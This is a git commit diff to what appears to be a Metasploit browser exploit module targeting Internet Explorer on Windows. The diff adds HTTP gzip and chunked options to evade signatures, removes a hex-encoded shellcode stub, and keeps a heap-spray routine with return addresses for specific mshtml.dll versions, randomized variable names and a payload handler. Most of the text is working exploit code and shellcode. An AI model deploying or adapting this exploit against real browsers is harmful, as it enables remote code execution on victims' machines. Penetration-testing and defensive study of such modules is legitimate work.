Correct some assumptions about client-side exploit signature development, remove the prepend since we dont use .net anymore
git-svn-id: file:///home/svn/framework3/trunk@7616 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore
parent
e3a1a7958e
commit
927563c135
|
|
@ -50,7 +50,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'EXITFUNC' => 'process',
|
||||
'HTTP::compression' => 'gzip',
|
||||
'HTTP::chunked' => true
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
@ -60,20 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
{
|
||||
'ConnectionType' => '-find',
|
||||
},
|
||||
'StackAdjustment' => -3500,
|
||||
|
||||
# Temporary stub virtualalloc() + memcpy() payload to RWX page
|
||||
'PrependEncoder' =>
|
||||
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"+
|
||||
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"+
|
||||
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"+
|
||||
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+
|
||||
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+
|
||||
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+
|
||||
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x54"+
|
||||
"\xca\xaf\x91\xff\xd6\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08"+
|
||||
"\x56\x6a\x00\xff\xd0\x89\xc3\xeb\x0d\x5e\x89\xdf\xb9\xe8\x03\x00"+
|
||||
"\x00\xfc\xf3\xa4\xff\xe3\xe8\xee\xff\xff\xff"
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
|
|
@ -85,16 +74,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
|
||||
# resulting eips:
|
||||
# 0x501d6bd8 # windows vista ie7 (mshtml.dll 7.0.6001.18203)
|
||||
# 0xc5fe7dc9 # windows xp sp3 ie6 (mshtml.dll 6.0.2900.5848)
|
||||
# nul deref! # windows xp sp3 ie7 (mshtml.dll 7.0.5730.13)
|
||||
# 0x6e767fae # windows 2k3 sp2 ie6 (mshtml.dll 6.0.3790.4470)
|
||||
# 0x6cf941a7 # windows 2k3 sp2 ie7 (mshtml.dll 7.0.6000.16825)
|
||||
|
||||
|
||||
print_status("Entering heap spray mode for #{cli.peerhost}:#{cli.peerport}")
|
||||
|
||||
|
||||
var_memory = rand_text_alpha(rand(100) + 1)
|
||||
var_boom = rand_text_alpha(rand(100) + 1)
|
||||
var_body = rand_text_alpha(rand(100) + 1)
|
||||
|
|
@ -106,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
var_ss = rand_text_alpha(rand(100) + 1)
|
||||
var_fb = rand_text_alpha(rand(100) + 1)
|
||||
var_bk = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
|
||||
html = %Q|<!DOCTYPE>
|
||||
<head>
|
||||
<script language=javascript>
|
||||
|
|
@ -130,10 +119,10 @@ for (#{var_i}=0;#{var_i}<1285;#{var_i}++) #{var_memory}[#{var_i}]=#{var_bk}+#{va
|
|||
</body>
|
||||
</html>
|
||||
|
|
||||
|
||||
|
||||
# Transmit the response to the client
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
|
||||
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue